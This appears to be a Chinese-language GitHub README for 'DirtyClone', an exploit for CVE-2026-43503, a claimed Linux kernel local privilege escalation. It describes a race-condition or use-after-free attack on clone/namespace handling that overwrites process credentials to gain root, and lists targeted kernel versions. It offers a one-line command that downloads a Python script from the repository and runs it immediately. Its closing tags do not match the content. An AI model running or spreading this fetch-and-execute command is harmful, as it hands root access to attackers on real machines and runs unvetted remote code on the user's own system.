aexdyhaxor/CVE-2026-43503-DirtyClone

# CVE-2026-43503 - DirtyClone 一个针对 **CVE-2026-43503**（被称为 **DirtyClone**）的本地提权（LPE）漏洞利用程序。本仓库包含一个概念验证（PoC），演示了低权限用户如何滥用 Linux 内核 clone/namespace 子系统中的缺陷，从而获取完全的 `root` 权限。 ## 技术概述 **DirtyClone** 针对的是处理容器化 namespace 和进程克隆（`kernel/fork.c` 或相关子系统）的特定内核子系统内的竞态条件/释放后使用（use-after-free）漏洞。通过精心安排特定的 clone flag 并结合密集的内存布局风水（memory feng-shui），无特权的本地攻击者可以破坏内核内存结构，进而获得任意写原语，以覆盖进程凭证（`struct cred`）。 ### 影响 * **漏洞类型：** 本地提权（LPE） * **严重程度：** 高 / 严重 * **目标：** Linux 内核版本 5.10.257 , 5.15.208 , 6.1.174, 6.6.141, 6.12.91, 6.18.33 ### 快速执行（单行命令） ``` wget https://raw.githubusercontent.com/aexdyhaxor/CVE-2026-43503-DirtyClone/refs/heads/main/dirtyclone.py && python3 dirtyclone.py ```

标签：Linux内核, PoC, Web报告查看器, 安全, 安全渗透, 暴力破解, 本地提权, 超时处理, 逆向工具